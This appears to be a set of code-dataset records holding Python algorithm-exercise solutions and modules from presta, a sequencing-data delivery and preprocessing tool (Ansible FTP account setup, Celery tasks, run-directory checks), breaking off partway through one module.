"text": "# O(n) time | O(n) space\ndef longestPeak(array):\n if len(array) == 0: return 0\n peak_environment = []\n tmp_environment = [array[0]]\n \n inc = True\n dec = False\n first_change = False\n first_check = True\n inc_added = False\n dec_added = False\n for index in range(1, len(array)):\n if inc:\n if array[index] > tmp_environment[-1]:\n if first_check:\n first_check = False\n inc_added = True\n tmp_environment.append(array[index])\n elif array[index] < tmp_environment[-1]:\n if first_check:\n tmp_environment.clear()\n inc_added = False\n dec_added = False\n tmp_environment.append(array[index])\n continue\n tmp_environment.append(array[index])\n inc = False\n dec = True\n first_change = True\n dec_added = True\n else:\n inc = True\n dec = False\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n tmp_environment.append(array[index])\n first_check = True\n elif dec:\n if array[index] > tmp_environment[-1]:\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n if first_change:\n tmp_environment.append(array[index - 1])\n first_change = False\n dec_added = True\n tmp_environment.append(array[index])\n dec = False\n inc = True\n elif array[index] < tmp_environment[-1]:\n tmp_environment.append(array[index])\n else:\n inc = True\n dec = False\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n tmp_environment.clear()\n tmp_environment.append(array[index])\n if index == len(array) - 1:\n if len(tmp_environment) >= 3 and len(tmp_environment) >= len(peak_environment) and inc_added and dec_added:\n peak_environment = tmp_environment[0:]\n if not inc_added or not dec_added: return 0\n return len(peak_environment)\n\n\narr = [1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3]\nprint(longestPeak(arr))\n"
},
{
"alpha_fraction": 0.48043185472488403,
"alphanum_fraction": 0.5249662399291992,
"avg_line_length": 26.481481552124023,
"blob_id": "943c3ef355e5b63646eef32ec25bf7e84b248a62",
"content_id": "03e8ce92de759e92e1aaed24a1cc9642335e6910",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 27,
"path": "/DynamicProgramming/LevenshteinDistance/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(min(n, m)) space\ndef levenshteinDistance(str1, str2):\n str1_array = [i for i in range(len(str1) + 1)]\n str2_array = [i for i in range(len(str2) + 1)]\n \n last_array = str2_array[0:]\n curr_array = [0 for i in range(len(str2_array))]\n i = 0\n while i < len(str1):\n curr_array[0] = str1_array[i + 1]\n for j in range(1, len(str2_array)):\n if str1[i] == str2[j - 1]:\n curr_array[j] = last_array[j - 1]\n else:\n curr_array[j] = min(min(curr_array[j - 1], last_array[j - 1]), last_array[j]) + 1\n last_array = curr_array[0:]\n i += 1\n\n return last_array[-1]\n\n \n\n\nstr1 = 'abc'\nstr2 = 'yabd'\n\nprint(levenshteinDistance(str1, str2))"
},
{
"alpha_fraction": 0.4802955687046051,
"alphanum_fraction": 0.5197044610977173,
"avg_line_length": 21.61111068725586,
"blob_id": "e4b3fc92c99eab4083bed8fbf11ed4449f91689c",
"content_id": "7e630c60d63df768955276a81b5ec31250b63ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/Greedy/TaskAssignment/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def taskAssignment(k, tasks):\n tasks.sort()\n left = 0\n right = len(tasks) - 1\n\t\n result = []\n while left < right:\n result.append([left, right])\n left += 1\n right -= 1\n\n maxx = 0\n for elem in result:\n if tasks[elem[0]] + tasks[elem[1]] > maxx:\n maxx = tasks[elem[0]] + tasks[elem[1]]\n return result\n\nprint(taskAssignment(3, [1, 3, 5, 3, 1, 4]))"
},
{
"alpha_fraction": 0.44947734475135803,
"alphanum_fraction": 0.4843205511569977,
"avg_line_length": 27.799999237060547,
"blob_id": "52b1801a2ab26e73479da14ef4c2f792acda16c3",
"content_id": "8723ff217fdbc345b1eb590e5cdf1e70b06f566e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 10,
"path": "/Recursion/NthFibonacci/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef getNthFib(n, cache={1: 0, 2: 1}):\n if n == 1: return 0\n elif n < 4: return 1\n else:\n if n in cache:\n return cache[n]\n else:\n cache[n] = getNthFib(n - 2, cache) + getNthFib(n - 1, cache)\n return cache[n]"
},
{
"alpha_fraction": 0.6235294342041016,
"alphanum_fraction": 0.6235294342041016,
"avg_line_length": 20.299999237060547,
"blob_id": "640781d8c7ba0c58c7ae9ba770b375a122022e01",
"content_id": "089a2910e13c216cbdebca1019317256e299be64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/BinaryTrees/InvertBinaryTree/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(d) where d is the depth of the tree\n\ndef invertBinaryTree(tree):\n if tree == None:\n\t return\n tmp = tree.left\n tree.left = tree.right\n tree.right = tmp\n\t\n invertBinaryTree(tree.left)\n invertBinaryTree(tree.right)\n\t\n\n\n# This is the class of the input binary tree.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None"
},
{
"alpha_fraction": 0.6253665685653687,
"alphanum_fraction": 0.6319648027420044,
"avg_line_length": 33.125,
"blob_id": "2fbbac06b6c9db2cad9a287b003fac85f47deaa9",
"content_id": "5327f13009798f4eb8170214eab4dd6f108afdb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1364,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 40,
"path": "/DynamicProgramming/LongestStringChain/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n*m^2 + nlog(n)) time | O(n) space\ndef longestStringChain(strings):\n strings.sort(key=len)\n cache = {}\n for string in strings:\n cache[string] = {'smallerString': \"\", 'chainSize': 1}\n for string in strings:\n buildLongestStringChain(string, cache)\n return getLongestChain(cache, strings)\n\n\ndef buildLongestStringChain(string, cache):\n for i in range(len(string)):\n curr_string = string[0:i] + string[i + 1:]\n if curr_string in cache:\n updateLongestStringChain(string, curr_string, cache)\n\ndef updateLongestStringChain(string, curr_string, cache):\n if cache[curr_string]['chainSize'] + 1 > cache[string]['chainSize']:\n cache[string]['smallerString'] = curr_string\n cache[string]['chainSize'] = 1 + cache[curr_string]['chainSize']\n\ndef getLongestChain(cache, strings):\n length = 0\n start_string = ''\n for string in strings:\n if cache[string]['chainSize'] > length:\n length = cache[string]['chainSize']\n start_string = string\n if length == 1: return []\n curr_string = start_string\n result = []\n while curr_string != '':\n result.append(curr_string)\n curr_string = cache[curr_string]['smallerString']\n return result\n\nstrings = [\"abde\", \"abc\", \"abd\", \"abcde\", \"ade\", \"ae\", \"1abde\", \"abcdef\"]\n\nprint(longestStringChain(strings))"
},
{
"alpha_fraction": 0.5381047129631042,
"alphanum_fraction": 0.5626242756843567,
"avg_line_length": 28.038461685180664,
"blob_id": "3a602f62a261ff026cc0e19b2cc8822c87314fa1",
"content_id": "a0c28f5bf3abd8a24c1a9daeea010e1e5da9d1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 52,
"path": "/ArraysCategory/SubarraySort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef subarraySort(array):\n if(all(array[i] <= array[i + 1] for i in range(len(array) - 1))): \n return [-1, -1]\n\n bad_start_index = -1\n bad_end_index = len(array) - 1\n for i in range(len(array) - 1):\n if array[i] > array[i + 1]:\n bad_start_index = i + 1\n break\n \n for i in range(len(array) - 1, 0, -1):\n if array[i] < array[i - 1]:\n bad_end_index = i\n break\n \n subarray = array[bad_start_index: bad_end_index + 1]\n\n lower_array = array[0:bad_start_index]\n upper_array = array[bad_end_index + 1:]\n\n print(lower_array, subarray, upper_array)\n \n if len(upper_array) != 0:\n min_from_upper = min(min(upper_array), min(subarray))\n else:\n min_from_upper = min(subarray)\n\n if len(lower_array) != 0:\n max_lower_array = max(max(lower_array), max(subarray))\n else:\n max_lower_array = max(subarray)\n\n true_starting_index_for_sort = bad_start_index\n true_ending_index_for_sort = bad_end_index\n\n for i in range(len(lower_array)):\n if lower_array[i] > min_from_upper:\n true_starting_index_for_sort = i\n break\n\n for i in range(len(upper_array)):\n if upper_array[i] < max_lower_array:\n true_ending_index_for_sort = i + len(lower_array) + len(subarray)\n\n print(true_starting_index_for_sort, true_ending_index_for_sort)\n\narr = [4, 8, 7, 12, 11, 9, -1, 3, 9, 16, -15, 11, 57]\n\n\nsubarraySort(arr)"
},
{
"alpha_fraction": 0.5358649492263794,
"alphanum_fraction": 0.5791139006614685,
"avg_line_length": 28.65625,
"blob_id": "3491d20fd6d0150311bf5c20ee57a97e4175847f",
"content_id": "c6dcbb9dad2dd41f515b77bd9bf671a500ae9bf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 32,
"path": "/DynamicProgramming/DiskStacking/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef diskStacking(disks):\n \n disks.sort(key=take_third)\n\n heights = [elem[2] for elem in disks]\n \n for i in range(len(heights)):\n for j in range(0, i):\n if is_bigger(disks[i], disks[j]):\n heights[i] = max(heights[i], disks[i][2] + heights[j])\n\n biggest_value = max(heights)\n biggest_value_index = heights.index(biggest_value)\n \n result = []\n while biggest_value > 0:\n result.append(disks[biggest_value_index])\n biggest_value = biggest_value - disks[biggest_value_index][2]\n if biggest_value != 0:\n biggest_value_index = heights.index(biggest_value)\n\n return result[::-1]\n\ndef take_third(elem):\n return elem[2]\n\ndef is_bigger(elem1, elem2):\n return elem1[0] > elem2[0] and elem1[1] > elem2[1] and elem1[2] > elem2[2]\n\ndisks = [[2, 1, 2], [3, 2, 3], [2, 2, 8], [2, 3, 4], [1, 3, 1], [4, 4, 5]]\nprint(diskStacking(disks))"
},
{
"alpha_fraction": 0.6356164216995239,
"alphanum_fraction": 0.6438356041908264,
"avg_line_length": 23.399999618530273,
"blob_id": "015d1192128a7291a1ddebe67e911ebf158de7ea",
"content_id": "ef54e04147e0728f34e5d5369e5edb3ac883652e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 15,
"path": "/BinaryTrees/NodeDepths/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# This is the class of the input binary tree.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\t\t\ndef calculateDepth(root, depth, sums) -> None:\n\tif root == None:\n\t\treturn 0\n\t\n\tsums.append(depth)\n\t\t\n\tcalculateDepth(root.left, depth + 1, sums)\n\tcalculateDepth(root.right, depth + 1, sums)"
},
{
"alpha_fraction": 0.4637436866760254,
"alphanum_fraction": 0.4890387952327728,
"avg_line_length": 32,
"blob_id": "ae62eeef79c018d1d77ac797a09c0606fcd5adb4",
"content_id": "abcc3ef6d44b876b54edec2aef9fb69733142858",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/DynamicProgramming/MinNumberOfCoinsForChange/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(n) space where m = length(denoms)\ndef minNumberOfCoinsForChange(n, denoms):\n numbers = [0 for i in range(0, n + 1)]\n denoms.sort()\n for denom in denoms:\n for i in range(0, n + 1):\n if denom == i:\n numbers[i] = 1\n elif denom < i:\n if numbers[i%denom] != 0:\n numbers[i] = min(1+ numbers[i - denom], numbers[i])\n elif i%denom == 0:\n numbers[i] = int(i/denom)\n \n return numbers[-1]\nn = 10\narr = [1, 3, 4]\nprint(minNumberOfCoinsForChange(n, arr))"
},
{
"alpha_fraction": 0.5111111402511597,
"alphanum_fraction": 0.574305534362793,
"avg_line_length": 24.280702590942383,
"blob_id": "1d860a964af9e0a63ef3380555a259bb0033f379",
"content_id": "00ede163f5cfc3f016251ee72127bd4b7b4b3fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1440,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 57,
"path": "/ArraysCategory/SpiralTraverse/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef spiralTraverse(array):\n right_steps = len(array[0])\n elements_visitted = 0\n\t\n total_number_of_elements = len(array)*len(array[0])\n output_array = []\n\t\n up_bound = 0\n right_bound = len(array[0]) - 1\n down_bound = len(array) - 1\n left_bound = 0\n\t\n current_round = 1\n\t\n while elements_visitted < total_number_of_elements:\n\t\n\t down_steps = right_steps\n\t left_steps = right_steps - 1\n\t up_steps = right_steps - 1\n\t\t\n\t for i in range(current_round - 1, right_steps):\n\t\t output_array.append(array[up_bound][i])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(current_round, down_steps):\n\t\t output_array.append(array[i][right_bound])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(left_steps - 1, current_round - 2, -1):\n\t\t output_array.append(array[down_bound][i])\n\t\t elements_visitted += 1\n\t\t\t\n\t for i in range(up_steps - 1, current_round - 1, -1):\n\t\t output_array.append(array[i][left_bound])\n\t\t elements_visitted += 1\n\t\t\t\n\t current_round += 1\n\t right_steps -= 1\n\t up_bound += 1\n\t right_bound -= 1\n\t down_bound -= 1\n\t left_bound += 1\n\n print(elements_visitted, total_number_of_elements)\n return output_array\n\n\narr = [\n [19, 32, 33, 34, 25, 8],\n [16, 15, 14, 13, 12, 11],\n [18, 31, 36, 35, 26, 9],\n [1, 2, 3, 4, 5, 6],\n [20, 21, 22, 23, 24, 7],\n [17, 30, 29, 28, 27, 10]\n ]\nprint(spiralTraverse(arr))"
}
] | 66 |
ratzeni/presta | https://github.com/ratzeni/presta | c54abbce84e6ae500489cf667783ced1f5db81c9 | d6ec511b75c7a077245aff48301a764e262ab524 | 0bb0544f94c786257ed233827b6fe27e8968ec01 | refs/heads/master | 2020-12-26T02:11:17.194836 | 2016-10-05T10:05:29 | 2016-10-05T10:05:29 | 66,929,617 | 0 | 0 | null | 2016-08-30T10:07:50 | 2016-05-24T10:41:18 | 2016-07-25T07:44:37 | null | [
{
"alpha_fraction": 0.5312439203262329,
"alphanum_fraction": 0.532217264175415,
"avg_line_length": 40.42741775512695,
"blob_id": "dafb532aabcfbe728556ccb94fd1d6941429abf0",
"content_id": "2a88042da483f77ae7888e190dcf89a2683d5d2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10274,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 248,
"path": "/presta/delivery.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHandle the delivery of NGS data obtained from the pre-processing step\n\n inputs: datasets in fastq.gz format retrieved from a filesystem path\n destinations:\n an iRODS collection\n a different filesystem path\n a library of a Galaxy Server\n a folder of a FTP server\n\"\"\"\n\nimport os\nimport sys\n\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.vars import VariableManager\nfrom ansible.inventory import Inventory\nfrom ansible.executor.playbook_executor import PlaybookExecutor\nfrom alta.utils import ensure_dir\nfrom collections import namedtuple\nfrom client import Client\nfrom datasets import DatasetsManager\nfrom presta.app.tasks import copy\nfrom presta.utils import path_exists, get_conf\n\n\nDESTINATIONS = ['collection', 'path', 'library', 'ftp']\nSAMPLE_TYPES_TOSKIP = ['FLOWCELL', 'POOL']\n\nclass DeliveryWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n self.destination = args.destination\n self.dry_run = args.dry_run\n\n conf = get_conf(logger, args.config_file)\n self.conf = conf\n\n self.batch_id = batch_id = args.batch_id\n c = Client(conf=conf, logger=logger)\n c.init_bika()\n batch_info = c.bk.get_batch_info(batch_id)\n if batch_info:\n self.batch_info = batch_info\n else:\n logger.error('I have not found any information of the samples '\n 'owned by the batch {}'.format(batch_id))\n sys.exit()\n\n # input path must exists as parser argument or as config file argument\n if args.input_path:\n input_path = args.input_path\n else:\n io_conf = conf.get_io_section()\n input_path = io_conf.get('archive_root_path')\n path_exists(input_path, logger)\n self.input_path = input_path\n\n output_path = args.output_path if args.output_path else None\n self.output_path = output_path\n\n inventory = args.inventory if args.inventory else None\n self.inventory = inventory\n\n playbook_path = args.playbook_path if args.playbook_path else None\n self.playbook_path = playbook_path\n\n def __fs2fs_carrier(self, ipath, opath):\n bids = [_ for _ in self.batch_info.keys() if self.batch_info[_].get(\n 'type') not in SAMPLE_TYPES_TOSKIP]\n self.logger.info('Looking for files related to {} Bika ids'.format(\n len(bids)))\n self.logger.info('Starting from {}'.format(ipath))\n if len(bids) > 0:\n ensure_dir(os.path.join(opath, self.batch_id))\n\n dm = DatasetsManager(self.logger, bids)\n datasets_info, count = dm.collect_fastq_from_fs(ipath)\n self.logger.info(\"found {} files\".format(count))\n\n for bid in bids:\n if bid in datasets_info:\n for f in datasets_info[bid]:\n src = f.get('filepath')\n read = f.get('read_label')\n lane = f.get('lane')\n ext = f.get('file_ext')\n sample_label = self.batch_info[bid].get('client_sample_id')\n sample_label = '_'.join(\n [sample_label.replace(' ', '_'), lane, read]) if lane else '_'.join(\n [sample_label.replace(' ', '_'), read])\n sample_label = '.'.join([sample_label, ext])\n dst = os.path.join(opath, self.batch_id, sample_label)\n\n self.logger.info(\"Coping {} into {}\".format(src, dst))\n if os.path.isfile(dst):\n self.logger.info('{} skipped'.format(os.path.basename(\n dst)))\n else:\n if not self.dry_run:\n copy.si(src, dst).delay()\n self.logger.info(\n '{} copied'.format(os.path.basename(dst)))\n else:\n msg = 'I have not found any file related to this ' \\\n 'Bika id: {}'.format(bid)\n self.logger.warning(msg)\n self.logger.info('{} skipped'.format(bid))\n\n def __execute_playbook(self, playbook, inventory_file,\n random_user, random_clear_text_password):\n path_exists(playbook, self.logger)\n path_exists(inventory_file, self.logger)\n\n variable_manager = VariableManager()\n loader = DataLoader()\n\n inventory = Inventory(loader=loader,\n variable_manager=variable_manager,\n host_list=inventory_file)\n\n Options = namedtuple('Options', ['listtags', 'listtasks',\n 'listhosts', 'syntax', 'connection',\n 'module_path', 'forks',\n 'remote_user', 'private_key_file',\n 'ssh_common_args', 'ssh_extra_args',\n 'sftp_extra_args', 'scp_extra_args',\n 'become', 'become_method',\n 'become_user', 'verbosity', 'check'])\n\n options = Options(listtags=False, listtasks=False, listhosts=False,\n syntax=False, connection='ssh', module_path=None,\n forks=1, remote_user=None,\n private_key_file=None, ssh_common_args=None,\n ssh_extra_args=None, sftp_extra_args=None,\n scp_extra_args=None, become=True,\n become_method='sudo', become_user='root',\n verbosity=None, check=False)\n\n variable_manager.extra_vars = {'r_user': random_user,\n 'r_password': random_clear_text_password}\n passwords = {}\n\n pbex = PlaybookExecutor(playbooks=[playbook],\n inventory=inventory,\n variable_manager=variable_manager,\n loader=loader, options=options,\n passwords=passwords)\n results = pbex.run()\n return results\n\n def run(self):\n if self.destination == 'path':\n io_conf = self.conf.get_io_section()\n if self.output_path:\n output_path = self.output_path\n else:\n output_path = io_conf.get('ds_export_path')\n\n # if not path_exists(output_path, logger, force=False):\n # ensure_dir(output_path)\n # path_exists(output_path, logger)\n self.__fs2fs_carrier(self.input_path, output_path)\n\n if self.destination == 'ftp':\n def pass_gen(length):\n import string\n import random\n\n ascii = string.ascii_letters + string.digits + '@-_'\n\n return \"\".join([list(set(ascii))[random.randint(0, len(list(set(\n ascii))) - 1)] for i in range(length)])\n\n random_user = pass_gen(8)\n random_clear_text_password = pass_gen(12)\n\n self.logger.info('Creating random account into the ftp server')\n self.logger.info('user: {}'.format(random_user))\n self.logger.info('password: {}'.format(random_clear_text_password))\n\n playbook_label = 'create_ftp_user.yml'\n if self.playbook_path:\n playbook_path = self.playbook_path\n else:\n io_conf = self.conf.get_io_section()\n playbook_path = os.path.expanduser(io_conf.get('playbooks_path'))\n playbook = os.path.join(playbook_path, playbook_label)\n path_exists(playbook, self.logger)\n\n inventory_label = 'inventory'\n if self.inventory:\n inventory = self.inventory\n else:\n io_conf = self.conf.get_io_section()\n inventory_path = os.path.expanduser(io_conf.get('playbooks_path'))\n inventory = os.path.join(inventory_path,\n inventory_label)\n path_exists(inventory, self.logger)\n\n results = self.__execute_playbook(playbook,\n inventory,\n random_user,\n random_clear_text_password)\n self.logger.info('Playbook result: {}'.format(results))\n\n if self.output_path:\n output_path = self.output_path\n else:\n io_conf = self.conf.get_io_section()\n output_path = os.path.join(io_conf.get('ftp_export_path'),\n random_user)\n path_exists(output_path, self.logger)\n\n self.__fs2fs_carrier(self.input_path, output_path)\n\n\nhelp_doc = \"\"\"\nHandle the delivery of NGS data obtained from the pre-processing step\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--batch_id', metavar=\"STRING\",\n help=\"Batch id from BikaLims\", required=True)\n parser.add_argument('--destination', '-d', type=str, choices=DESTINATIONS,\n help='where datasets have to be delivered',\n required=True)\n parser.add_argument('--dry_run', action='store_true', default=False,\n help='Delivery will be only described.')\n parser.add_argument('--input_path', '-i', metavar=\"PATH\",\n help=\"Where input datasets are stored\")\n parser.add_argument('--output_path', '-o', metavar=\"PATH\",\n help=\"Where output datasets have to be stored\")\n parser.add_argument('--playbook_path', metavar=\"PATH\",\n help=\"Path to playbooks dir\")\n parser.add_argument('--inventory', metavar=\"PATH\",\n help=\"Path to inventory file\")\n\n\ndef implementation(logger, args):\n workflow = DeliveryWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('delivery', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.6858006119728088,
"alphanum_fraction": 0.6858006119728088,
"avg_line_length": 22.64285659790039,
"blob_id": "c0cecda5519a9ad1d22fe41d849daf129e241f62",
"content_id": "1ceee216bfbf29fe1d47ecbfee73a0409e24d471",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 14,
"path": "/presta/app/__init__.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\nimport os\nfrom celery import Celery\n\napp = Celery('app',\n include=['app.tasks'])\n\n# Set default configuration module name\nos.environ.setdefault('CELERY_CONFIG_MODULE', 'app.celeryconfig')\n\napp.config_from_envvar('CELERY_CONFIG_MODULE')\n\nif __name__ == '__main__':\n app.start()\n"
},
{
"alpha_fraction": 0.5261182188987732,
"alphanum_fraction": 0.5273693799972534,
"avg_line_length": 33.3763427734375,
"blob_id": "e38f5ae1361695e052afff0c1e564c72cba1b58e",
"content_id": "28c0c091a60823ad51f79ae9e97dfeb94bff181b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 93,
"path": "/presta/check_rundirs.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom presta.utils import path_exists, get_conf\nfrom presta.app.tasks import rd_ready_to_be_preprocessed, process_rundir\n\n\nclass RundirsRootpath(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n\n conf = get_conf(logger, args.config_file)\n\n if args.root_path:\n self.root_path = args.root_path\n else:\n io_conf = conf.get_io_section()\n self.root_path = io_conf.get('rundirs_root_path')\n\n do_conf = conf.get_section('data_ownership')\n self.user = do_conf.get('user')\n self.group = do_conf.get('group')\n\n self.ir_conf = conf.get_irods_section()\n self.proc_rundir = args.proc_rundir\n\n\n def check(self):\n def flatten(l):\n out = []\n for item in l:\n if isinstance(item, (list, tuple)):\n out.extend(flatten(item))\n else:\n out.append(item)\n return out\n\n path_exists(self.root_path, self.logger)\n localroot, dirnames, filenames = os.walk(self.root_path).next()\n\n positive_labels = ['finished', \"ownership ok\" ,\n 'SampleSheet found', 'Barcodes have the same size', 'Metadata found']\n negative_labels = ['running ', \"waiting for ownership's modification\",\n 'SampleSheet not found',\n \"Barcodes don't have the same size\", 'Metadata not found']\n\n dir_dict = dict()\n for d in dirnames:\n dir_dict[d] = []\n d_path = os.path.join(self.root_path, d)\n checks = rd_ready_to_be_preprocessed(user=self.user,\n group=self.group,\n path=d_path,\n rd_label=d,\n ir_conf=self.ir_conf)\n\n if self.proc_rundir and checks[0] and checks[1] and checks[2][0]:\n process_rundir.delay(rd_path=d_path, rd_label=d)\n\n checks = flatten(checks)\n for i in range(len(checks)):\n if checks[i]:\n dir_dict[d].append(positive_labels[i])\n else:\n dir_dict[d].append(negative_labels[i])\n\n self.logger.info('Checking rundirs in: {}'.format(self.root_path))\n\n for d, labels in dir_dict.iteritems():\n self.logger.info(' ')\n self.logger.info('Rundir {}'.format(d))\n self.logger.info('{}'.format(labels))\n\n\nhelp_doc = \"\"\"\nStarting from a root path, print the state of all the rundirs found.\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--root_path', metavar=\"PATH\",\n help=\"alternative rundirs root path\")\n parser.add_argument('--proc_rundir', action='store_true',\n help='process rundir if ready')\n\n\ndef implementation(logger, args):\n rr = RundirsRootpath(logger=logger, args=args)\n rr.check()\n\n\ndef do_register(registration_list):\n registration_list.append(('check', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.6700000166893005,
"alphanum_fraction": 0.6700000166893005,
"avg_line_length": 19,
"blob_id": "b243757e1631ece270035d8fd25a6e8f166d86ff",
"content_id": "99e287802848bb29d434d6effebb3d49141d80cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 500,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 25,
"path": "/Makefile",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "PRESTA_DIR=${HOME}/presta\nTARGETS=all install install_user clean uninstall\n\nall:\n\t@echo \"Try one of: ${TARGETS}\"\n\ninstall: build config\n\tpip install dist/*.whl\n\nbuild: clean\n\tpython setup.py bdist_wheel\n\nclean:\n\tpython setup.py clean --all\n\tfind . -regex '.*\\(\\.pyc\\|\\.pyo\\)' -exec rm -fv {} \\;\n\trm -rf dist *.egg-info\n\nconfig:\n\tmkdir -p ${PRESTA_DIR}\n\tif [ ! -f ${PRESTA_DIR}/presta_config.yml ]; then \\\n\t\tcp presta/config/presta_config.yml ${PRESTA_DIR}; \\\n\tfi\n\nuninstall:\n\tpip uninstall -y presta\n"
},
{
"alpha_fraction": 0.5075128674507141,
"alphanum_fraction": 0.5088788270950317,
"avg_line_length": 41.110618591308594,
"blob_id": "f6b573288643ca5fe43df39251ec7530f266b322",
"content_id": "69366379ec7bec00ce06fa22a77c8cbf15c90b15",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9517,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 226,
"path": "/presta/proc_rundir.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os.path\nimport sys\n\nfrom alta.utils import ensure_dir\nfrom presta.utils import path_exists, get_conf\nfrom presta.app.tasks import bcl2fastq, rd_collect_fastq, move, qc_runner, \\\n rd_ready_to_be_preprocessed, \\\n copy_samplesheet_from_irods, copy_run_info_to_irods, copy_run_parameters_to_irods, \\\n replace_values_into_samplesheet, sanitize_metadata, replace_index_cycles_into_run_info, copy_qc_dirs\nfrom celery import chain\n\n\nclass PreprocessingWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n rpath = args.rd_path\n cpath = args.rd_path.replace('running', 'completed')\n apath = os.path.join(cpath, 'raw')\n self.rd = {'rpath': rpath,\n 'cpath': cpath,\n 'apath': apath,\n 'label': os.path.basename(args.rd_path)\n }\n conf = get_conf(logger, args.config_file)\n self.conf = conf\n\n dspath = os.path.join(cpath, 'datasets')\n self.ds = {'path': dspath}\n\n fqc_basepath = os.path.join(dspath, 'fastqc')\n self.fqc = dict(path=fqc_basepath)\n\n io_conf = conf.get_io_section()\n export_path = os.path.join(io_conf.get('qc_export_basepath'),\n self.rd['label'])\n self.fqc.update(dict(export_path=export_path))\n\n ssheet = {'basepath': os.path.join(cpath),\n 'filename': 'SampleSheet.csv'}\n ssheet['file_path'] = os.path.join(ssheet['basepath'],\n ssheet['filename'])\n self.samplesheet = ssheet\n\n run_info = {'basepath': os.path.join(rpath),\n 'filename': 'RunInfo.xml'}\n run_info['file_path'] = os.path.join(run_info['basepath'],\n run_info['filename'])\n run_info['file_apath'] = os.path.join(apath,\n run_info['filename'])\n self.run_info = run_info\n\n run_parameters = {'basepath': 